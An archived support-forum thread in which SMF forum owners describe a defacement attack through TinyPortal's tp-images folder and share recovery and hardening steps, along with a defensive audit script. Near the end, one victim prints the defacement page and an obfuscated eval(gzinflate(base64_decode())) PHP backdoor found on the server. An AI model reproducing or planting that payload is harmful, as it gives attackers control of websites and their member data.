Simple Machines Community Forum

SMF Support => SMF 2.0.x Support => Topic started by: Scooby on January 02, 2012, 06:18:58 PM

Title: Help with hack SouTHRaNDA wAs HeRE
Post by: Scooby on January 02, 2012, 06:18:58 PM
Could anyone give me advice on how to recover from a hack by "SouTHRaNDA wAs HeRE"? I am using Linux and Apache and SMF 2.0 RC5.
Not sure if the hack was into Linux or SMF, but my SMF index.php was changed, and installing a new version does not help.
More details of what I am using are available if needed.
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: Illori on January 02, 2012, 07:26:04 PM
There are several security issues with RC5; I would suggest you contact your host and upgrade to 2.0.2.
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: sonnenblende on January 03, 2012, 01:07:33 PM
Hi,

I had the exact same issue with two older SMF sites today.

Best way to fix is:

a) restore index.php and Settings.php from last backup (you should always run backups!)

b) make sure your index.php and Settings.php are NOT world/group writable!

c) make sure your /tp-images folder is NOT world/group writable!

d) remove the directory "File" from /tp-images (that's where they seem to break in)

e) by all means CHANGE your database and administrator passwords (part of the hack is them trying to pull a dump of your members table!)

That should clear it. Most important thing is indeed they must not be able to use PHP code to overwrite your index.php and Settings.php - it depends on your host's setup if and how they can achieve that.

Regards,
Jerry
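The file-system items in Jerry's checklist (steps a to d) can be checked and applied with a script rather than by hand. The following is an added example, not code from SMF or TinyPortal: it audits a forum root for group/world-writable index.php, Settings.php and SSI.php (SSI.php is added because posts further down the thread report it being overwritten too), for a writable tp-images/ directory, for the tp-images/File drop directory and for anything PHP-like under tp-images, then tightens the modes and moves tp-images/File into a quarantine directory outside the web root so the host can examine it. Function names, the demo tree and the quarantine path are assumptions for illustration; restoring from backup and rotating the database and admin passwords (steps a and e) are not automated here.

```shell
#!/bin/sh
# Added example, not SMF/TinyPortal code. Assumes POSIX sh with find/chmod/sed
# and that the forum root is passed as the first argument (default: current dir).

# Print one line per finding; always returns 0 so it composes with `set -e`.
smf_audit() {
    root="${1:-.}"
    # (a)/(b) the files the attackers overwrote must not be group/world writable
    for f in index.php Settings.php SSI.php; do
        if [ -f "$root/$f" ] && [ -n "$(find "$root/$f" \( -perm -020 -o -perm -002 \) -print)" ]; then
            echo "WRITABLE: $f is group- or world-writable"
        fi
    done
    if [ -d "$root/tp-images" ]; then
        # (c) the upload directory itself must not be group/world writable
        if [ -n "$(find "$root/tp-images" -prune \( -perm -020 -o -perm -002 \) -print)" ]; then
            echo "WRITABLE: tp-images/ is group- or world-writable"
        fi
        # (d) the "File" subdirectory is where the drop files were found
        if [ -d "$root/tp-images/File" ]; then
            echo "SUSPECT: tp-images/File exists"
        fi
        # tp-images is meant for images only; anything PHP-like under it
        # (including renamed uploads such as weba.php.pjpg) is a finding
        find "$root/tp-images" -type f \( -name '*.php' -o -name '*.php.*' -o -name '*.phtml' \) \
            | sed "s|^$root/|SUSPECT: PHP-like file in upload dir: |"
    fi
    return 0
}

# Number of findings, for scripting (0 means the file-system checks pass).
smf_audit_count() {
    echo $(( $(smf_audit "$1" | wc -l) ))
}

# Apply the file-system parts of the checklist: tighten modes and move
# tp-images/File out of the web root into a quarantine directory (second
# argument) so its contents can be examined or handed to the host.
smf_harden() {
    root="$1"
    quarantine="$2"
    for f in index.php Settings.php SSI.php; do
        if [ -f "$root/$f" ]; then chmod 644 "$root/$f"; fi
    done
    if [ -d "$root/tp-images" ]; then chmod 755 "$root/tp-images"; fi
    if [ -d "$root/tp-images/File" ]; then
        mkdir -p "$quarantine"
        mv "$root/tp-images/File" "$quarantine/File"
    fi
    return 0
}

# Constructed sample tree reproducing the state described in the thread
# (loose modes, a tp-images/File directory, a renamed PHP upload).
smf_make_demo_root() {
    d="$1"
    mkdir -p "$d/tp-images/File" "$d/Sources"
    printf '<?php echo "forum"; ?>\n' > "$d/index.php"
    printf '<?php $db_passwd = "constructed"; ?>\n' > "$d/Settings.php"
    printf '<?php // ssi ?>\n' > "$d/SSI.php"
    printf 'not an image\n' > "$d/tp-images/File/weba.php.pjpg"
    chmod 666 "$d/index.php" "$d/Settings.php"
    chmod 644 "$d/SSI.php"
    chmod 777 "$d/tp-images"
    return 0
}

# Usage: sh smf_audit.sh /path/to/forum
if [ $# -gt 0 ]; then
    smf_audit "$1"
fi
```

Run the audit first, keep its output with the security report, and only then run the hardening step; the quarantined directory is what a host or the SMF security team will ask to see.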
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: IchBin™ on January 03, 2012, 03:06:12 PM
Quote from: sonnenblende on January 03, 2012, 01:07:33 PM
Hi,

I had the exact same issue with two older SMF sites today.

Best way to fix is:

a) restore index.php and Settings.php from last backup (you should always run backups!)

b) make sure your index.php and Settings.php are NOT world/group writable!

c) make sure your /tp-images folder is NOT world/group writable!

d) remove the directory "File" from /tp-images (that's where they seem to break in)

e) by all means CHANGE your database and administrator passwords (part of the hack is them trying to pull a dump of your members table!)

That should clear it. Most important thing is indeed they must not be able to use PHP code to overwrite your index.php and Settings.php - it depends on your host's setup if and how they can achieve that.

Regards,
Jerry

I should note that I fixed the security issue with the tp-images/ folder back in TP 1 rc1.2. If you are not running TP on or after that version, you are vulnerable.
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: Scooby on January 03, 2012, 04:30:18 PM
I have checked and made sure I have it all set as you suggest. I did have an old version of TP; I am not using it, but the directories and files are there, so I will sort that. I don't, however, have a File directory under tp-images, so I would guess they broke in some other way.

Do you know if this hack does get them the members table? I will email all the members anyway.
Thanks for the help.
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: IchBin™ on January 03, 2012, 04:39:55 PM
If any hacker gains access to your file system, you can count on them getting database access from your Settings.php file. There have only been two security exploits to TinyPortal that I can recall. One that I fixed, which I mentioned, in RC1.2. And the other one was from the FCKeditor that was exploited when TinyPortal included that as part of its code. If you have such an old version that still has the FCKeditor folder in it, I'd highly suggest you remove it or update your mod install.
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: badping on January 28, 2012, 12:56:53 PM
I wanted to add a couple of things to this thread based on my experience this morning with this. After overwriting my settings file and index file I still had to overwrite my SSI file as well.
At that point I looked into my Packages for updates of my forum. I was informed I was running an outdated forum version.
I had 1.1.15 and needed to update to 1.1.16.
In my attempt, two PHP files failed in my Sources folder, Packages.php and MessageIndex.php.

So I overwrote those from the same backup I had prior to getting hacked - reran the update test and both then passed with success, and I updated. I then went and changed my admin PW and my database PW.

Looks like I am back up and running, and all seems good.

Final thoughts are that I think you would need to also fix those two other PHP files in the Sources folder, as they are somehow affected by the hack. I see no other way, since the update passed after I fixed them from a recent backup.

Oh, another note: checking into my "File" folder in tp-images I saw a list of crazy HTML pages.

So I think that the goal is to shut your site down, harvest emails and host their own webpages containing whatever was on them. I did not want to visit any of the sites, just move on with my life.

Good luck and hope you do not have to deal with this - it's a waste of a couple of hours of your life, but at least it appears to be recoverable...
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: Intangir on January 31, 2012, 05:06:15 PM
Does anyone know how it actually works?
Is it the SMF code it exploits? Does the new patch fix it?
Or could it be a mod? I have TinyPortal.

I was also hacked and I'm doing a full restore just to be safe, but while it's running I don't want to be hacked again (I put the forum into maintenance mode, but I don't know if that will stop it).

Full restore is taking forever ;()

Has anyone been hacked again since updating? Do they get member passwords or anything?

Wow, on another note it took me about 12-13 'new images' before I could possibly comprehend the verification image... wtf?
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: Illori on January 31, 2012, 05:10:03 PM
This was an issue in TinyPortal as IchBin posted; if there were further issues related to this, they would have been posted in the TinyPortal support thread.
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: Intangir on January 31, 2012, 08:32:55 PM
When I try to upgrade to 1.1.16 from 1.1.15 it says:

The package you are trying to download or install is either corrupt or not compatible with this version of SMF
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: Illori on January 31, 2012, 08:56:47 PM
If you do a search on the forum for that message you will find the fix; it has been posted several times.
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: Intangir on January 31, 2012, 09:17:24 PM
Any more direction than that? Because I DID do a search, I found TONS of posts, and most of them either say it doesn't work or it did work.

A few say rezip it, which I tried; that didn't work.

There's gotta be more help out there than "it works", "it doesn't work", "I rezipped it",

because that is really not very useful.
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: JimM on February 09, 2012, 08:47:18 PM
@ Intangir - Did you get that message after clicking on the link in the admin center? If you did, try downloading the update file from here > http://custom.simplemachines.org/mods/downloads/smf_patch_1.0.22_1.1.16.tar.gz and install it like a mod with the Package Manager.
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: slvreagl on April 08, 2012, 11:53:23 PM
Son of a **** I got hit with this today.....
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: slvreagl on April 09, 2012, 10:11:39 PM
Quote from: slvreagl on April 08, 2012, 11:53:23 PM
Son of a **** I got hit with this today.....

So I did the above recommendations and found my SSI.php was also attacked. After deleting and restoring all three files from a known good backup I am back up and running, and my database was not affected (I use a different password for database access). They attacked via FTP and simply overwrote my files that were writable (stupid mistake!). Not sure how they got my FTP password, but they have all been changed.

I should also note I got attacked running SMF 2.0.2 and TinyPortal 1.107
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: MrPhil on April 10, 2012, 09:01:16 AM
Quote from: slvreagl on April 09, 2012, 10:11:39 PM
Not sure how they got my FTP password, but they have all been changed.
Very easily if you have spyware on any PC used to administratively access your site. With a keystroke logger or password sniffer, a hacker knows your new password as soon as you type it in. Be sure to do a thorough spyware scan on your PC(s), and to change passwords again if the scan reveals any spyware. And of course, you have a firewall to stop unauthorized data transfers (such as sending out a captured password), right?

Note that ftp sends its password in clear text. That can be another route for grabbing your password. You may want to ask your host if they support SFTP (encrypted) file transfer.

Quote
I should also note I got attacked running SMF 2.0.2 and TinyPortal 1.107
Probably irrelevant information, if they got in by knowing your FTP password.
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: IchBin™ on April 10, 2012, 11:54:49 AM
Quote from: slvreagl on April 09, 2012, 10:11:39 PM
So I did the above recommendations and found my SSI.php was also attacked. After deleting and restoring all three files from a known good backup I am back up and running, and my database was not affected (I use a different password for database access). They attacked via FTP and simply overwrote my files that were writable (stupid mistake!). Not sure how they got my FTP password, but they have all been changed.

I should also note I got attacked running SMF 2.0.2 and TinyPortal 1.107

A couple of things to note. If you are on shared hosting, it often happens that a hacker can compromise another site on the same server that you are on, which then gives them access to the rest of the sites on the server because the host doesn't have everything properly configured.

It's best to fill out a security report and to provide ALL the information asked for on that form.
http://www.simplemachines.org/about/smf/security.php
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: Lord Anubis on April 10, 2012, 04:14:17 PM
Blah, this bastard got me too :o

Downloading my backup from 5 days ago, gonna take a bit since it's 300 GB.... LMFAO
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: IchBin™ on April 10, 2012, 04:25:48 PM
You should keep an eye on this topic too Anubis.
http://www.simplemachines.org/community/index.php?topic=466873.msg3311171#msg3311171
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: Lord Anubis on April 10, 2012, 04:37:44 PM
Thanks Brad, I think I did remove the FCKeditor when I read about the vulnerability in the past.

Also noticed this hacker added 404.php files in a few folders (so others might want to look for that as well)

- Root
- Themes
- Sources

I already cleared these files from my server, and I didn't save them (so I can't post them up)
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: TeaTephi on April 10, 2012, 06:54:56 PM
I was hacked also, but have followed the above advice and hopefully it will be ok now! Keeping watch on this thread; if any more great advice pops up, I will be heeding it for sure.
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: slvreagl on April 12, 2012, 12:32:09 AM
In case anyone was wondering, this is the code on all three files that were hacked on my site, index.php, Settings.php, SSI.php:
<html>
    <head>
        <meta content="DiRTY SouTH" name="copyright">
        <meta content="southranda, dirty south, southranda was here" name="keywords">
        <meta content="SouTHRaNDA wAs HeRE" name="description">
        <title>by SouTHRaNDA</title>
        <link href="http://i.lulzimg.com/9b7d4026e6.gif" rel="shortcut icon">
    </head>
    <body bgcolor="#ffffff" text="#a9a9a9" onmousedown="return false;" onkeydown="return false;" oncontextmenu="return false;">
       <br>
       <div align="center">
           <br>
           <b>SouTHRaNDA wAs HeRE</b><br><br><i>con gli occhi rossi</i><br>
           <br>
           <img src="http://i.imgur.com/QmRje.jpg">
           <br>
           <br>
           <i>porta droga<br><br>bianca vergine pura<br><br>toglimi la paura</i><br><br><br>© <b>DiRTY SouTH</b><br>
           <br>
           <br>
           <embed src="http://www.youtube.com/v/oij0kscC2Yc&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
       </div>
    </body>
</html>


Also found and deleted the directory tp-images/File
with the following files:
weba.php.pjpg

index.php
<?php /*00000000000000000000000000000000*/ eval(gzinflate(base64_decode('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